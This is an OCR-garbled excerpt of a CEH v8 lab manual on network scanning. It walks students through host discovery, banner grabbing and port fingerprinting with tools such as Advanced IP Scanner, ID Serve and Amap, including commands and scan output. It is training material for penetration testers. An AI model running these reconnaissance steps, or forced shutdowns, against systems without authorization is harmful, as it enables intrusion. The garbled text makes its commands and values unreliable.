CEH Lab Manual

S c a n n i n g N e t w o r k s

M o d u le 03
 M o d u le 0 3 - S c a n n in g N e tw o rk s

S c a n n in g a T a r g e t N e tw o rk
S c a n n in g a n e tw o rk re fe rs to a s e t o f p ro c e d u re s fo r id e n tify in g h o s ts , p o /ts , a n d

s e rv ic e s ru n n in g in a n e tw o rk .

L a b S c e n a r io

I CON KEY Vulnerability scanning determines the possibility of network security attacks. It
evaluates the organization’s systems and network for vulnerabilities such as missing
Valuable
information patches, unnecessary services, weak authentication, and weak encryption.
Vulnerability scanning is a critical component of any penetration testing assignment.
s Test your
You need to conduct penetration testing and list die direats and vulnerabilities
knowledge
found in an organization’s network and perform port s c a n n in g , n e tw o rk s c a n n in g ,
H Web exercise and v u ln e ra b ility s c a n n in g ro identify IP/hostname, live hosts, and vulnerabilities.
Q Workbook review
L a b O b j e c t iv e s

The objective of diis lab is to help students in conducting network scanning,

analyzing die network vulnerabilities, and maintaining a secure network.
You need to perform a network scan to:
■ Check live systems and open ports
■ Perform banner grabbing and OS fingerprinting
■ Identify network vulnerabilities
■ Draw network diagrams of vulnerable hosts

ZZ7 T o o ls L a b E n v ir o n m e n t
d e m o n stra te d in
t h is la b a r e 111 die lab, you need:
a v a ila b le in
■ A computer running with W in d o w s S e r v e r 2 0 1 2 , W in d o w s S e rv e r 2008.
D:\CEH-
W in d o w s 8 or W in d o w s 7 with Internet access
T o o ls\ C E H v 8
M o du le 0 3 ■ A web browser
S c a n n in g
N e tw o rk s
■ Admiiiistrative privileges to run tools and perform scans

L a b D u r a t io n

Time: 50 Minutes

O v e r v ie w o f S c a n n in g N e t w o r k s

Building on what we learned from our information gadiering and threat modeling,
we can now begin to actively query our victims for vulnerabilities diat may lead to a
compromise. We have narrowed down our attack surface considerably since we first
began die penetration test with everydiing potentially in scope.

C E H Lab M anual Page S5 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Note that not all vulnerabilities will result in a system compromise. When searching
for known vulnerabilities you will find more issues that disclose sensitive
information or cause a denial of service condition than vulnerabilities that lead to
remote code execution. These may still turn out to be very interesting on a
penetration test. 111 fact even a seemingly harmless misconfiguration can be the
nuiiing point in a penetration test that gives up the keys to the kingdom.
For example, consider FTP anonymous read access. This is a fairly normal setting.
Though FTP is an insecure protocol and we should generally steer our clients
towards using more secure options like SFTP, using FTP with anonymous read
access does not by itself lead to a compromise. If you encounter an FTP server that
allows anonymous read access, but read access is restricted to an FTP directory that
does not contain any files that would be interesting to an attacker, then die risk
associated with the anonymous read option is minimal. On die other hand, if you
are able to read the entire file system using die anonymous FTP account, or possibly
even worse, someone lias mistakenly left die customer's trade secrets in die FTP
directory that is readable to die anonymous user; this configuration is a critical issue.
Vulnerability scanners do have their uses in a penetration test, and it is certainly
useful to know your way around a few of diem. As we will see in diis module, using
a vulnerability scanner can help a penetration tester quickly gain a good deal of
potentially interesting information about an environment.
111 diis module we will look at several forms of vulnerability assessment. We will
study some commonly used scanning tools.

Lab T asks

TASK 1 Pick an organization diat you feel is worthy of your attention. This could be an
educational institution, a commercial company, or perhaps a nonprofit charity.
Overview
Recommended labs to assist you in scanning networks:
■ Scanning System and Network Resources Using A d v a n c e d IP S c a n n e r

■ Banner Grabbing to Determine a Remote Target System Using ID S e r v e

■ Fingerprint Open Ports for Running Applications Using the A m a p Tool

■ Monitor TCP/IP Connections Using die C u r r P o r t s Tool

■ Scan a Network for Vulnerabilities Using G F I L an G u ard 2 0 1 2

L_/ Ensureyouhave ■ Explore and Audit a Network Using N m ap

readyacopyof the
additional readings handed ■ Scanning a Network Using die N e t S c a n T o o ls Pro
out for this lab.
■ Drawing Network Diagrams Using LA N S u rv ey o r

■ Mapping a Network Using the F r ie n d ly P in g e r

■ Scanning a Network Using die N essu s Tool

■ Auditing Scanning by Using G lo b a l N e tw o rk In v e n to ry

■ Anonymous Browsing Using P r o x y S w it c h e r

C E H Lab M anual Page 86 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council

AB Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ Daisy Chaining Using P r o x y W o rk b e n c h

■ HTTP Tunneling Using H T T P o r t

■ Basic Network Troubleshooting Using the M e g a P in g

■ Detect, Delete and Block Google Cookies Using G -Z a p p e r

■ Scanning the Network Using the C o la s o f t P a c k e t B u ild e r

■ Scanning Devices in a Network Using T h e Dude

L a b A n a ly s is

Analyze and document die results related to die lab exercise. Give your opinion on
your target’s security posture and exposure duough public and free information.

P LEA S E T A LK TO YO U R IN S T R U C T O R IF YOU H A V E Q U ES T IO N S
R E L A T E D TO TH IS LAB.

C E H Lab M anual Page 87 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

S c a n n in g S y s te m a n d N e tw o rk
R e s o u r c e s U s in g A d v a n c e d IP
S canner
-A d v a n c e d IP S c a n n e r is a fr e e n e tir o r k s c a n n e r th a t g iv e s y o n v a rio u s ty p e s o f
I CON KEY
in fo rm a tio n re g a rd in g lo c a l n e tir o r k c o m p u te rs .
/ =‫ ־‬Valuable
information
L a b S c e n a r io
✓ Test your
knowledge 111this day and age, where attackers are able to wait for a single chance to attack an
organization to disable it, it becomes very important to perform vulnerability
S Web exercise
scanning to find the flaws and vulnerabilities in a network and patch them before an
C Q Workbook review attacker intrudes into the network. The goal of running a vulnerability scanner is to
identify devices on your network that are open to known vulnerabilities.

L a b O b j e c t iv e s

The objective of this lab is to help students perform a local network scan and
l— J T o o ls discover all the resources 011 die network.
d e m o n stra te d in
You need to:
t h is la b a r e
a v a ila b le in ■ Perform a system and network scan
D:\CEH-
■ Enumerate user accounts
T o o ls\ C E H v 8
M o du le 0 3 ■ Execute remote penetration
S c a n n in g
N e tw o rk s ■ Gather information about local network computers

L a b E n v ir o n m e n t

111 die lab, you need:

Q Youcanalso
downloadAdvancedIP ■ Advanced IP Scanner located at Z:\\C EH v8 M od ule 0 3 S c a n n in g
Scanner from
http:/1www.advanced-ip- N e tw o rk s\ S c a n n in g T o o ls A d v a n c e d IP S c a n n e r
scanner.com.
■ You can also download the latest version of A d v a n c e d IP S c a n n e r
from the link http://www.advanced-ip-scanner.com

C E H Lab M anual Page 88 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ If you decide to download the la t e s t v e r s io n , then screenshots shown

/ 7AdvancedIPScanner in the lab might differ
works onWindows Server
2003/ Server 2008andon ■ A computer running W in d o w s 8 as die attacker (host machine)
Windows 7(32bit, 64bit).
■ Another computer running W in d o w s se rve r 2008 as die victim (virtual
machine)
■ A web browser widi In te rn e t access

■ Double-click ip s c a n 2 0 .m s i and follow die wizard-driven installation steps

to install Advanced IP Scanner
■ A d m in is tra tiv e privileges to run diis tool

L a b D u r a t io n

Time: 20 Minutes

O v e r v ie w o f N e t w o r k S c a n n in g

Network scanning is performed to c o lle c t in fo rm a tio n about liv e s y s t e m s , open

ports, and n e tw o rk v u ln e ra b ilitie s. Gathered information is helpful in determining
t h r e a t s and v u ln e r a b ilitie s 111 a network and to know whether there are any
suspicious or u n a u th o rize d IP connections, which may enable data theft and cause
damage to resources.

Lab T asks
S T A S K 1 1. Go to S ta r t by hovering die mouse cursor in die lower-left corner of die
desktop

L a u n c h in g
A d v a n c e d IP
Scann er

FIGURE1.1:Windows8- Desktopview
2. Click A d v a n c e d IP S c a n n e r from die S ta r t menu in die attacker machine
(Windows 8).

C E H Lab M anual Page 89 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl

A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Admin ^
S ta rt

WinRAR Mozilla Command Fngago

Firefox Prompt Packet
b uilder

Nc m
it t
2*
C om puter M icrosoft Advanced
Clip IP Scanner
O rganizer
m WithAdvancedIP
Scanner, youcanscan Sports tS m
hundreds ofIP addresses
simultaneously. C ontrol
Panel
M icrosoft
O ffice 2010
Upload...
i i i l i l i

finance •

FIGURE12. Windows8- Apps

3. The A d v a n c e d IP S c a n n e r main window appears.

Youcanwake any
machineremotelywith
AdvancedIP Scanner, if
theWake-on‫־‬LANfeature
is supportedbyyour
networkcard.

FIGURE13: TheAdvancedIPScannermainwindow
4. Now launch die Windows Server 2008 virtual machine (v ic tim ’s m a c h in e ).

C E H Lab M anual Page 90 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl

A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

L_/ Youhaveto guess a

rangeof IP address of
victimmachine.

iik O jf f lc k 10:09 FM J

FIGURE1.4:ThevictimmachineWindowsserver2008
a Radmin2.xand3.x 5. Now, switch back to die attacker machine (Windows 8) and enter an IP
Integrationenableyouto address range in die S e le c t ra n g e field.
connect (ifRadminis
installed) to remote 6. Click die S c a n button to start die scan.
computers withjust one
dick.

The status of scanis

shownat the bottomleft
sideofthewindow.

7. A d v a n c e d IP S c a n n e r scans all die IP addresses within die range and

displays the s c a n r e s u lt s after completion.

C E H Lab M anual Page 91 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11

A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Lists of computers A d v a n c e d IP Scanner

savingandloadingenable File Actions Settings View Heip
youtoperformoperations
withaspecificlist of IP c d id 3? f i l : Like us on
computers.Just savealist J► Scar' Jl r=£k=3 r f t o ■ 1 Facebook

ofmachines youneedand 10.0.0.1-10.0.0.10

AdvancedIPScanner loads
it at startupautomatically. R esits | Favorites |

Status
r Manufacturer MAC address
0 w 10.0.0.1 10.0.a1 Nlctgear, Inc. 00:09:5B:AE:24CC
‫> ט‬£* WIN-MSSELCK4K41 10.0.a2 Dell Inc DO:67:ES:1A:16:36
® & WINDOWS# 10.0.03 Microsoft Corporation 1
00: 5:5D: A8:6E:C6
WIN*LXQN3WR3R9M 10.0.05 M icrosoft Corporation 00:15:5D:A8:&E:03
® 15 WIN-D39MR5H19E4 10.0.07 Dell Inc D4:3E.-D9: C3:CE:2D

m Group Operations:
AnyfeatureofAdvanced
IP Scanner can beused
withanynumber of
selectedcomputers. For
example, youcanremotely
shut downacomplete
computer classwithafew
dicks. 5a iv*, 0 d«J0, S unknown

FIGURE1.6:TheAdvancedIPScannermainwindowafterscanning
8. You can see in die above figure diat Advanced IP Scanner lias detected
die victim machine’s IP address and displays die status as alive
9. Right-click any of die detected IP addresses. It will list Wake-On-LAN. Shut
M T A S K 2 down, and Abort Shut d o w n

Extract Victim’
s 5‫־‬ A d v a n c e d IP Scanner

IP Address Info F ie A ctions Settings View Helo

Scan II ip c u u * *sS: Wi Like us on

Facebook

10.0.0.1-10.0.0.10
Resuts Favorites |

MAC address
Status Name
n to ru fa c tu re r
10.0.0.1 10.0.011 Netgear. In c 00:09:5B:AE:24CC
IHLMItHMM, — D0t67:E5j1A:16«36
WINDOWS8 t* p ‫׳‬ore M icrosoft Corporation □0:15 :‫צ‬U: A8:ofc:Ot>
hi WIN-LXQN3WR3
WIN‫ ־‬D39MR5HL<
Copy

Add to ‘Favorites'
! M icrosoft Corporation
Dell Inc
00:15:SD:A8:6E:03
CW:BE:D9:C3:CE:2D

Rescan selected
Sive selected...

Wdke‫־‬O n‫־‬LAN
Shut dcwn...
Abort shut dcwn

Radrnir
a Wake-on-LAN: You
canwakeanymachine 5 alive. 0 dead, 5 unknown

remotelywithAdvancedIP
Scanner, ifWake-on-LAN FIGURE1.7:TheAdvancedIPScannermainwindowwithAliveHost list
featureis supportedby
your networkcard. 10. The list displays properties of the detected computer, such as IP
address. N a m e , M A C , and N e t B I O S information.

11. You can forcefully Shutdown, Reboot, and Abort S h u t d o w n die

selected victim machine/IP address

C E H Lab M anual Page 92 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

&
‫״‬m s i *
S h u td o w n o p tio n s
File Actions Settings View Help
r Use Vtindcms authentifcation
Like us on
Scan
J!] .■ ] Jser narre: Facebook

Winfingerprint Input
11 0.0.0.1-100.0.10
9essM ord:

rn e o c t (sec): [60
3
Options: Results | Favorites |
Message:

■ IPRange (Netmaskand Status Name jre r MAC address

InvertedNetmask ® a
1a0.0.1
WIN-MSSELCK4K41
00;C9;5B:AE:24;CC
D0:67:E5:1A:16:36
supported) IPListSmgle W IND O W S It ion 00:15:3C:A0:6C:06
Host Neighborhood $
WIN-LXQN3WR3R9M It ion 00:13:3D:A8:6E:03
» a WIN-D39MR5HL9E4 D4:BE:D9:C3:CE:2D

I” Forced shjtdo/vn

f " Reooot

S alive, Odcad, 5 unknown

FIGURE1.8:TheAdvancedIPScannerComputerpropertieswindow
12. Now you have die IP address. Nam e, and other details of die victim
machine.
13. You can also try Angry IP scanner located at D:\CEH-Tools\CEHv8
Module 03 Scanning Networks\Ping Sweep Tools\Angry IP Scanner It
also scans the network for machines and ports.

L a b A n a ly s is

Document all die IP addresses, open ports and dieir running applications, and
protocols discovered during die lab.
Tool/U tility Information Collected/Objectives Achieved
Scan Information:
■ IP address
Advanced IP ■ System name
Scanner ■ MAC address
■ NetBIOS information
■ Manufacturer
■ System status

C E H Lab M anual Page 93 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E T A LK TO YO UR IN S T R U C T O R IF YOU H A V E Q U ES T IO N S
R E L A T E D TO TH IS LAB.

Q u e s t io n s

1. Examine and evaluate the IP addresses and range of IP addresses.

Internet Connection Required

□ Yes 0 No
Platform Supported
0 Classroom 0 iLabs

C E H Lab M anual Page 94 Eth ica l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

B a n n e r G ra b b in g t o D e te r m in e a
R e m o t e T a r g e t S y s t e m u s i n g ID
S e rv e
ID S S e rv e is u s e d to id e n tify th e m a k e , ///o d e /, a n d v e rs io n o f a n y w e b s ite 's s e rv e r

s o fh v a re .

I CON KEY L a b S c e n a r io
Valuable 111 die previous lab, you learned to use Advanced IP Scanner. This tool can also be
information
used by an attacker to detect vulnerabilities such as buffer overflow, integer flow,
y* Test your SQL injection, and web application on a network. If these vulnerabilities are not
knowledge fixed immediately, attackers can easily exploit them and crack into die network and
Web exercise cause server damage.

O Workbook review Therefore, it is extremely important for penetration testers to be familiar widi
banner grabbing techniques to monitor servers to ensure compliance and
appropriate security updates. Using this technique you can also locate rogue servers
or determine die role of servers within a network. 111 diis lab, you will learn die
banner grabbing technique to determine a remote target system using ID Serve.

L a b O b j e c t iv e s

The objective of diis lab is to help students learn to banner grabbing die website and
discover applications running 011 diis website.
111 diis lab you will learn to:

O T o o ls ■ Identify die domain IP address

d e m o n stra te d in ■ Identify die domain information
t h is la b a r e
a v a ila b le in
L a b E n v ir o n m e n t
D:\CEH-
T o o ls\ C E H v 8 To perform die lab you need:
M o du le 0 3
S c a n n in g
■ ID Server is located at D :\ C E H -T o o ls \ C E H v 8 M o d u le 0 3 S c a n n in g

N e tw o rk s N e t w o r k s \ B a n n e r G ra b b in g T o o ls \ ID S e r v e

C E H Lab M anual Page 95 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ You can also download the latest version of ID S e rv e from the link
http: / / www.grc.com/id/idserve.htm
■ If you decide to download the la t e s t v e r s io n , then screenshots shown
in the lab might differ
■ Double-click id s e r v e to run ID S e r v e

■ Administrative privileges to run die ID S e rv e tool

■ Run this tool on W in d o w s S erv er 2012

L a b D u r a t io n

Time: 5 Minutes
O v e r v ie w o f ID S e r v e

ID Serve can connect to any s e r v e r po rt on any d o m a in or IP address, then pull

and display die server's greeting message, if any, often identifying die server's make,
model, and v e r s io n , whether it's for F T P , SMTP, POP, NEW’S, or anything else.

Lab T asks
TASK 1
1. Double-click id s e r v e located at D :\C E H -T o o ls\C E H v 8 M o d u le 0 3 S c a n n in g
Id en tify w e b s it e N e tw o rk s\ B a n n e r G ra b b in g T o o ls\ID S e r v e
s e r v e r in fo rm atio n
2. 111 die main window of ID S erv e show in die following figure, select die
S e v e r Q u e ry tab

0 ID Serve ‫׳‬- r o
InternetServer IdentificationUtility,vl .02
ID Serve Personal SecurityFreewarebySteveGibson
Copyright (c) 2003 by Gibson Research Corp

Background Server Query | Q&A/Help

Enter 01 copy / paste an Internet server URL 0 * IP address here (example www rmcrosoft com)
ri

r! Queiy The Server

^
When an Internet URL or IP has been provided above
press this button to rwtiate a query of the speahed server

Server

If anIPaddressis
enteredinsteadof aURL,
IDServewill attempt to
determine thedomain The server identified <se* as
name associatedwiththe ^4
IP
Copy goto ID Serve web page E*it

FIGURE21: MainwindowofIDServe
3. Enter die IP address 01‫־‬URL address in E n t e r o r C o p y /p a ste a n In te rn a l
s e r v e r U R L o r IP a d d r e s s h e re :

C E H Lab M anual Page 96 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

r© ID Serve

Internet Server IdentificationUtility, vl .02

ID Serve Personal SecurityFreeware bySteve Gibson
Copyright(c) 2003byGibsonResearchCorp.
Background Server Query I Q&A/tjelp

Entei or copy I paste an Internet serve* URL or IP adtfress here (example www microsoft com)

^ [www certifiedhacker com[

W h e n an Internet URL 0* IP has been piovided above,

Query T h e S w v e i
IDServecanaccept piess this button to initiate a query 01 the s p e c fo d server

the URLor IP as a
command-lineparameter Server query processing
(%

The server identified itse l as

Copy G oto ID S eive web page Ejjit

FIGURE22 EnteringdieURLforquery
4. Click Query The Server; it shows server query processed information
ID Serve ,‫ ־‬m x ‫׳‬

InternetServer IdentificationUtility, vl .02

ID Serve Personal SecurityFreeware bySteve Gibson
Copyright(c) 2003byGibsonResearchCofp
Background Server Query | Q&A/Help

Enter or copy / paste an Internet seivef URL or IP address here (example www m»c10s0ft com)
<T |www.certifiedhacker.com|
Q IDServecanalso
connect withnon-web Query The Server
W h e n an Internet URL 0* IP has been piovided above,
servers toreceiveand r2 [ press this button to initiate a queiy of the speafied server

report that server'sgreeting

message. Thisgenerally Seiver query processing
reveals the server's make, (3 Initiatingserverquery
model, version, andother LookingupIPaddressfordomain wwwcertifiedhackercom
potentiallyuseful TheIPaddressforthedomainis 202.7554101
information. ConnectingtotheserveronstandardHTTPport: 80
Connected] Requestingtheserver's defaultpage

The server identrfied itse l as

a M ic r o s o f t - I I S / 6 . 0

Copy Goto ID Serve web page Exit

FIGURE23: Serverprocessedinformation

L a b A n a ly s is

Document all die IP addresses, dieir running applications, and die protocols you
discovered during die lab.

C E H Lab M anual Page 97 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Tool/U tility Information Collected/Objectives Achieved

IP address: 202.75.54.101
Server Connection: Standard HT1P port: 80
Response headers returned from server:
ID Serve ■ H TTP/1.1 200
■ Server: Microsoft-IIS/6.0
■ X-Powered-By: PHP/4.4.8
■ Transfer-Encoding: chunked
■ Content-Type: text/html

PLEA SE T A LK TO YOUR IN S T R U C T O R IF YOU H AV E QUESTIONS

R E L A T E D TO TH IS LAB.

Q u e s t io n s

1. Examine what protocols ID Serve apprehends.

2. Check if ID Serve supports https (SSL) connections.

Internet Connection Required

□ Yes 0 No
Platform Supported
0 Classroom 0 iLabs

C E H Lab M anual Page 98 Eth ica l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

F in g e rp r in tin g O p e n P o r ts U s in g t h e
A m ap Tool
.- b n a p d e te rm in e s a p p lic a tio n s ru n n in g o n e a c h o p e n p o r t.

I CON KEY L a b S c e n a r io
2 ^
Valuable Computers communicate with each other by knowing die IP address in use and
information
ports check which program to use when data is received. A complete data transfer
Test vour always contains the IP address plus the port number required. 111 the previous lab
knowledge we found out that die server connection is using a Standard HTTP port 80. If an
g Web exercise attacker finds diis information, he or she will be able to use die open ports for
attacking die machine.
Q Workbook review
111 this lab, you will learn to use the Amap tool to perform port scanning and know
exacdy what a p p lic a t io n s are running on each port found open.

L a b O b j e c t iv e s

C 5 T o o ls The objective of diis lab is to help students learn to fingerprint open ports and
d e m o n stra te d in discover applications 11 inning on diese open ports.
t h is la b a r e
a v a ila b le in
hi diis lab, you will learn to:
D:\CEH- ■ Identify die application protocols running on open ports 80
T o o ls\ C E H v 8
M o du le 0 3 ■ Detect application protocols
S c a n n in g
N e tw o rk s L a b E n v ir o n m e n t

To perform die lab you need:

■ Amap is located at D :\ C E H -T o o ls \ C E H v 8 M o d u le 0 3 S c a n n in g
N e t w o r k s \ B a n n e r G ra b b in g T o o lsV A M A P

■ You can also download the latest version of A M A P from the link
http: / / www.thc.org dic-amap.
■ If you decide to download the la t e s t v e r s io n , then screenshots shown
in the lab might differ

C E H Lab M anual Page 99 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council

A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ A computer running Web Services enabled for port 80

■ Administrative privileges to run die A m a p tool

■ Run this tool on W in d o w s S e rv e r 2012

L a b D u r a t io n

Time: 5 Minutes
O v e r v ie w o f F in g e r p r in t in g

Fingerprinting is used to discover die applications running on each open port found
0 x1 die network. Fin g erp rin tin g is achieved by sending trig g e r p a c k e t s and looking
up die responses in a list of response strings.

Lab T asks
at T A S K 1

Id en tify
1. Open die command prompt and navigate to die Amap directory. 111 diis lab
A p p lic a tio n
die Amap directory is located at D :\C E H -T o o ls\C E H v 8 M od ule 0 3 S c a n n in g
N e tw o rk s\ B a n n e r G ra b b in g T o o ls\A M A P
P ro to c o ls R u n n in g
on P o rt 8 0 2. Type a m a p w w w .c e r t if ie d h a c k e r .c o m 8 0 , and press E n te r.
33 Administrator: Command Prompt
[D :\ C E H ~ T o o ls \C E H u 8 M o d u le 03 S c a n n i n g N e t w o r k \ B a n n e r G r a b b i n g T o o l s \A M A P > a n a p uw
[u . c e r t i f i o d h a c h e r . c o m 80
Anap 0 5 . 2 <w w w . t h e . o r g / t h c - a n a p ) s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 0 : 4 2 - MAPPING modo

Jn id en tifie d p o rts: 2 0 2 . ? 5 . 5 4 .1 0 1 : 8 0 / t c p < t o t a l 1>.

M ap 0 5 .2 f i n i s h e d a t 2012-08-28 1 2 :2 0 :5 3
D :\ C EH -T 0 0 1 s \C E H 08 M o d u le 03 S c a n n i n g N e t w o r k \ B a n n e r G r a b b i n g Tool s\AMAP>

Syntax: amap [-A| ‫־‬

B| -P|-W] [-1buSRHUdqv]
[[-m] -o <file>]
[-D<file>] [‫־‬t/‫־‬T sec] [-c
cons] [-Cretries]
[-pproto] [‫־‬i <file>] [target
port [port]...]
FIGURE3.1:Amapwithhostnamewww.ce1tifiedl1acke1.comwithPort SO
3. You can see die specific a p p lic a tio n protocols running 011 die entered host
name and die port 80.
4. Use die IP a d d re ss to check die applications running on a particular port.
5. 111 die command prompt, type die IP address of your local Windows Server
2008(virtual machine) a m a p 1 0 .0 .0 .4 75-81 (lo c a l W in d o w s S e r v e r 2 0 0 8 )
and press E n t e r (die IP address will be different in your network).
✓ For Amapoptions, 6. Try scanning different websites using different ranges of switches like amap
type amap-help. www.certifiedhacker.com 1-200

C E H Lab M anual Page 100 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

‫ד‬
D :\ C E H -T o o ls \C E H u 8 Module 03 S c a n n i n g N e t w o r k \ B a n n e r G r a b b i n g Tools\AMAP>amap I f
. 0 . 0 . 4 75-81
laroap v 5 . 2 <w w w . t h c . o r g / t h c - a n a p ) s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 1 - MAPPING mode
P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p
P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - a p a c h e - 2
W arn in g : C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 7 6 / t c p , d i s a b l i n g p o r t <EUN
Compiles on all UNIX KN>
basedplatforms - even W a rn in g : C ould n o t c o n n e c t < u n r e a c h a b l e ) t o 1 0 .0 .0 .4 :7 5 /tc p , d isab lin g p o r t <EUN
MacOSX, Cygwinon KH>
W arn in g : Could n o t c o n n e c t < u n r e a c h a b l e > to 1 0 .0 .0 .4 :7 7 /tc p , d isab lin g p o r t <EUN
Windows, ARM-Linuxand KH>
W arning: Could n o t c o n n e c t ( u n r e a c h a b l e ) to 1 0 . 0 . 0 . 4 : 7 8 / t c p , d i s a b l i n g p o r t <EUN
PalmOS KN>
W a rn in g : C ould n o t c o n n e c t < u n r e a c h a b l e > t o 1 0 .0 .0 .4 :7 9 /tc p , d isab lin g p o r t <EUN
|KN>
W arn in g : C ould n o t c o n n e c t < u n r e a c h a b l e > t o 1 0 . 0 . 0 . 4 : 8 1 / t c p , d i s a b l i n g p o r t <EUN
KN>
P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - i i s
P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s webmin
U n id e n tified p o rts : 1 0 .0 .0 .4 :7 5 /tc p 1 0 .0 .0 .4 :7 6 /tc p 1 0 .0 .0 .4 :7 7 /tc p 1 0 .0 .0 .4 :7 8 /
kcp 1 0 .0 .0 .4 :7 9 / t c p 1 0 .0 .0 .4 :8 1 /tc p < to t a l 6>.
Linap v 5 . 2 f i n i s h e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 4
b : \ C E H - T o o l s \ C E H v 8 Module 03 S c a n n i n g N e tw o r k N B a n n e r G r a b b i n g Tools\AMAP>

FIGURE3.2:AmapwithIPaddressandwithrangeofswitches73-81

L a b A n a ly s is

Document all die IP addresses, open ports and dieir running applications, and die
protocols you discovered during die lab.
Tool/U tility Information Collected/Objectives Achieved
Identified open port: 80
WebServers:
■ 11ttp-apache2 ‫־‬
■ http-iis
■ webmin
Amap Unidentified ports:
■ 10.0.0.4:75/tcp
■ 10.0.0.4:76/tcp
■ 10.0.0.4:77/tcp
■ 10.0.0.4:78/tcp
■ 10.0.0.4:79/tcp
■ 10.0.0.4:81/tcp

C E H Lab M anual Page 101 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E T A LK TO YO UR IN S T R U C T O R IF YOU H A V E Q U ES T IO N S
R E L A T E D TO TH IS LAB.

Q u e s t io n s

1. Execute the Amap command for a host name with a port number other
than 80.
2. Analyze how die Amap utility gets die applications running on different
machines.
3. Use various Amap options and analyze die results.

Internet Connection Required

0 Y es □ No
Platform Supported
0 Classroom □ iLabs

C E H Lab M anual Page 102 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

M o n ito r in g T C P /IP C o n n e c t i o n s
U s in g t h e C u r r P o r ts T o o l
C u n P o r ts is n e tw o rk m o n ito rin g s o fh ia re th a t d is p la y s th e lis t o f a ll c u r re n tly

o p e n e d T C P / IP a n d U D P p o r ts o n y o u r lo c a l c o m p u te r.

I CON K E Y L a b S c e n a r io
Valuable 111 the previous lab you learned how to check for open ports using the Amap
information
tool. As an e t h ic a l h a c k e r and p e n e t r a t io n t e s t e r , you must be able to block
Test your such attacks by using appropriate firewalls or disable unnecessary services
knowledge running 011 the computer.
w Web exercise You already know that the Internet uses a software protocol named T C P / IP to
m Workbook review format and transfer data. A11 attacker can monitor ongoing TCP connections
and can have all the information in the IP and TCP headers and to the packet
payloads with which he or she can hijack the connection. As the attacker has all
die information 011 the network, he or she can create false packets in the TCP
connection.
As a n etw o rk a d m in is tra to r., your daily task is to check the T C P / IP
c o n n e c t io n s of each server you manage. You have to m o n ito r all TCP and
UDP ports and list all the e s t a b lis h e d IP a d d r e s s e s of the server using the
C u r r P o r t s tool.

C J T o o ls
L a b O b j e c t iv e s
d e m o n stra te d in
t h is la b a r e The objective of diis lab is to help students determine and list all the TCP/IP
a v a ila b le in and UDP ports of a local computer.
D:\CEH-
T o o ls\ C E H v 8 111 in this lab, you need to:
M o du le 0 3
■ Scan the system for currently opened T C P / IP and UDP ports
S c a n n in g
N e tw o rk s ■ Gather information 011 die p o r ts and p ro cesses that are opened
■ List all the IP a d d r e s s e s that are currendy established connections
■ Close unwanted TCP connections and kill the process that opened the
ports

C E H Lab M anual Page 103 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
AB Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t

To perform the lab, you need:

